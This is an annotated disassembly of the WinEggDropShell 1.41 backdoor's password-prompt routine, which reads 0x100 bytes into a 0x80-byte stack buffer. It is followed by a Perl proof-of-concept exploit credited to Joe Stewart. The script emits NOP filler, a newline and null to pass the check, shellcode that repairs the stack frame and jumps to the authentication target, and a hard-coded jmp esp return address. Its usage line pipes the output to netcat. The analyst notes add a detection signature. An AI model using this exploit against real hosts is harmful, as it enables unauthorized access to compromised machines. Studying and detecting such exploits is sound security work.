; OllyDbg-style disassembly excerpt from the TBack module: the routine that
; prompts a connected client for a password and then reads the reply.
; The excerpt stops at the recv call, inside a loop whose end is not shown.
;
; Security-relevant point: the receive buffer at [EBP-80] is cleared with
; memset for 0x80 (128) bytes, but recv is then given BufSize = 0x100 (256)
; for that same buffer. The buffer begins 0x80 bytes below the frame pointer,
; so a reply longer than 0x80 bytes is written over the saved EBP and the
; return address. A bounded read would pass a BufSize no larger than 0x80.

; --- prologue: set up the frame and reserve 0x1AC bytes of locals ---
1000209E PUSH EBP
1000209F MOV EBP,ESP
100020A1 SUB ESP,1AC
; Fill the locals with the pattern FFFA5A5A: 0x6B dwords * 4 = 0x1AC bytes.
100020A7 MOV ECX,6B
100020AC /DEC ECX
100020AD |MOV DWORD PTR SS:[ESP+ECX*4],FFFA5A5A
100020B4 \JNZ SHORT TBack.100020AC
100020B6 PUSH ESI
100020B7 PUSH EDI
; [EBP+8] is the first argument; it is passed to recv as the Socket below.
; These two moves read it and store it back unchanged.
100020B8 MOV EDI,DWORD PTR SS:[EBP+8]
100020BB MOV DWORD PTR SS:[EBP+8],EDI
100020BE MOV DWORD PTR SS:[EBP-188],0
; --- build the prompt string "Enter Password:" in the buffer at [EBP-180] ---
100020C8 PUSH TBack.1003EC0D ; /<%s> = "Enter Password:"
100020CD PUSH TBack.10015210 ; |<%s> = ""
100020D2 PUSH TBack.1003EC1D ; |format = "%s%s"
100020D7 LEA EDI,DWORD PTR SS:[EBP-180] ; |
100020DD PUSH EDI ; |s
100020DE CALL TBack.10014E1C ; \sprintf
100020E3 ADD ESP,10
; Call TBack.100067C5 with (socket argument, prompt buffer).
; NOTE(review): presumably this sends the prompt to the client; the callee is
; not part of this excerpt, so confirm before relying on that.
100020E6 LEA EDI,DWORD PTR SS:[EBP-180]
100020EC PUSH EDI ; /Arg2
100020ED PUSH DWORD PTR SS:[EBP+8] ; |Arg1
100020F0 CALL TBack.100067C5 ; \TBack.100067C5
100020F5 ADD ESP,8
; Clear 0x100 bytes of the prompt buffer at [EBP-180].
100020F8 PUSH 100 ; /n = 100 (256.)
100020FD PUSH 0 ; |c = 00
100020FF LEA EDI,DWORD PTR SS:[EBP-180] ; |
10002105 PUSH EDI ; |s
10002106 CALL TBack.10014DEC ; \memset
1000210B ADD ESP,0C
; Save the current tick count in a local.
; NOTE(review): likely the start time for a timeout; its use is not shown here.
1000210E CALL TBack.10014978 ; [GetTickCount]
10002113 MOV DWORD PTR SS:[EBP-184],EAX
; --- receive loop (loop end is outside this excerpt) ---
; Clear the 0x80-byte receive buffer at [EBP-80] ...
10002119 /PUSH 80 ; /n = 80 (128.)
1000211E |PUSH 0 ; |c = 00
10002120 |LEA EDI,DWORD PTR SS:[EBP-80] ; |
10002123 |PUSH EDI ; |s
10002124 |CALL TBack.10014DEC ; \memset
10002129 |ADD ESP,0C
; ... then read up to 0x100 bytes into that same buffer. The length passed
; here is twice the size cleared above: this mismatch is the stack overflow.
1000212C |PUSH 0 ; /Flags = 0
1000212E |PUSH 100 ; |BufSize = 100 (256.)
10002133 |LEA EDI,DWORD PTR SS:[EBP-80] ; |
10002136 |PUSH EDI ; |Buffer
10002137 |PUSH DWORD PTR SS:[EBP+8] ; |Socket
1000213A |CALL TBack.10014718 ; \recv
#!/usr/bin/perl
# Proof-of-concept by Joe Stewart for the password-prompt overflow in the
# WinEggDropShell 1.41 backdoor (the TBack listing above). It writes a fixed
# byte sequence to STDOUT; the banner lines go to STDERR so they stay out of
# that stream.
#
# Analyst notes:
#  - Every address below is hard-coded in the 0x1000xxxx range used by the
#    TBack listing, and the banner names version 1.41. NOTE(review): other
#    builds presumably lay out code differently - confirm before assuming
#    this sequence applies to them.
#  - The bytes printed before the 4-byte address total 132 (0x80 + 4): the
#    0x80-byte buffer at [EBP-80] plus the saved EBP slot. The address
#    therefore lands on the saved return address.
#  - For detection: the stream starts with 109 bytes of 0x90 followed by
#    0a 00, sent in reply to the "Enter Password:" prompt.
#  - NOTE(review): the usage line and the final loop condition look truncated,
#    probably angle-bracketed text stripped when the page was extracted.
## usage: ./weds.pl | nc
$| = 1;    # unbuffered output
print STDERR "WinEggDropShell 1.41 Authentication Bypass Exploit\n";
print STDERR "By Joe Stewart <joe\@joestewart.org>\n";
print "\x90" x 109; # filler
print "\x0a\x00"; # newline + null to pass check
print "\x8d\xac\x24\x28\x04\x00\x00"; # LEA EBP,[ESP+428] // fixup ebp
print "\x83\xc4\x04"; # ADD ESP,4 // fixup esp
print "\xb8\xb8\x33\x00\x10"; # MOV EAX, 0x100033B8 // auth target
print "\xff\xe0"; # JMP EAX // go there
print "\x90\x90\x90\x90"; # doesn't matter (occupies the saved-EBP slot per the layout above)
print "\xa3\x39\x00\x10"; # location of jmp esp (little-endian 0x100039A3)
print "\xeb\xe5"; # jump to shellcode (short jump back into the bytes above)
# Loop that echoes $_ each pass; the condition is empty as rendered.
while () { print; }